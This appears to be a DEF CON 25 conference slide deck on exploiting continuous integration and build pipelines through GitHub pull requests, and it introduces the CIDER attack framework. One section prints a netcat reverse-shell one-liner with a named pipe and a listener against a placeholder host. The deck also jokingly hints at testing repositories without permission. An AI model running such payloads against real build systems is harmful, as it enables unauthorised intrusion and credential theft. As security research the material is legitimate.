Exploiting Continuous Integration (CI) and Automated Build Systems (DEF CON 25)

Post on 22-May-2020


Exploiting Continuous Integration (CI) and Automated Build Systems

And introducing CIDER

Whoami

• SpaceB0x
• Sr. Security Engineer at LeanKit
• Application and network security (offense and defense)
• I like breaking into systems, building systems, and learning
• Security consultant

./agenda.sh

• Overview of Continuous Integration concepts
• Configuration Vulnerabilities vs. Application Vulnerabilities
• Real world exploit #1
• Common Bad-practices
• Real world exploit #2 – Attacking the CI provider
• Introduce CIDER

Continuous Integration

Continuous Integration (CI)

• Quick iterative release of code to production servers
• Usually many iterations per week or even per day
• Repository centric
• In sync with Automated Build
• For infrastructure / servers / subnets etc.

Microservices

• Breaking down a large app into small decoupled components
• These components interact with each other
• Eliminates single points of failure
• Autonomous development

Security Implications

• Good – Frequent release cycles are fabulous!
• Good – Faster code deployments = quick remediation
• Good – Decoupled systems reduce single points of failure
• Good – Compromise of one service doesn't (always) mean full pwnage


• Bad – Fast release sometimes means hasty oversights
• Bad – Automated deployment systems are checked less than the code that they deploy

Tools

Build Systems

• Take code and build conditionally
• Typically in a quasi-containerized type of environment
• Both local and cloud based are popular

• Vendors:
  – Travis-CI
  – Circle-CI
  – Drone
  – TeamCity
  – BuildKite

Deployment Systems

• Deploy the code after build
• Heading more and more toward container driven

• Vendors:
  – Jenkins
  – Octopus Deploy
  – Kubernetes
  – Rancher
  – Mesosphere

Chains of Deployment


Checks in the SDLC

• Build test before merges
• Web-hooks trigger specific actions based on conditions
• Services configured without regard to one another

Configuration Problems

GitHub – Huge attack surface

• Pull requests and commits trigger builds
• Build configurations normally live in the root of the repo
• Thus a build config change can be part of a PR or commit
• Gain control of multiple systems through pull requests

Vulnerabilities are in Misconfiguration

• Creative configuration exploitation
• Vuln stacking at its finest
• Each individual service may be functioning exactly as intended
• Interaction between services is where many vulnerabilities lie

External Repos

• Most volatile attack surface
• Public repositories which map to internal build services

Real World Hax #1

Payload (a named pipe plus netcat, giving a reverse shell to x.x.x.x):

    mknod /tmp/backpipe p
    /bin/sh 0</tmp/backpipe | nc x.x.x.x 4444 1>/tmp/backpipe

Listener on x.x.x.x:

    nc -l 4444

Result: the returned shell runs as root

Bad-Practices / Worst-Practices

Environment Vars

• Being used to store credentials
• Storing metadata for other services within micro-service infrastructure

Run everything as root

• Just a container, right guyz?
• You now have internal network access
• Full control to build/augment the image

CI Provider Infoleak

• Problems with the CI providers themselves
• Leak SSH keys, etc. which can compromise other customers on the host
• CI providers have at least some permissions to GitHub repos
• Cloud based CI providers have a hosting environment
• Speaking of which…

Real World Hax #2

Introducing CIDER


What is CIDER?

• Continuous Integration and Deployment ExploiteR
• Framework for exploiting and attacking CI build chains
• Mainly leverages GitHub as attack surface to get to build services
• Takes the mess out of forking, PR-ing, callbacking
• It will poison a handful of build services and has "exploits" for each one

Why CIDER?

• Fun
• Make attacking easy
• Awareness
• Rotten Apple by @claudijd
• Facilitate further research

CIDER overview

CIDER – 'help'

CIDER – 'addtarget' & 'listtargets'

CIDER – 'load' and 'info'

CIDER features

• Node.JS
• Built modularly
• Can handle bulk lists of target repos
• Cleanup for GitHub repo craziness
• Ngrok – because port forwarding and public IPs suck

Ngrok

Disclaimer

• It is against the GitHub user agreement to test against a repository, even if you have permission from the owner of the repo

• You must be the owner to test a repo
• When testing, ask them to make you an owner

WINK WINK

DEMO

Limitations

• Build Queues
• GitHub Noise
• Timeouts
• Repo API request throttling

Just the beginning…

• More CI frameworks
• Start tackling deployment services
• Start exploring other entry points

• Other code repositories
• ChatOps (Slack)

Thanks

• LeanKit Operations Team
• Evan Snapp
• @claudijd

Fin

CIDER on GitHub: https://github.com/spaceB0x/cider

Twitter: @spaceB0xx
www.untamedtheory.com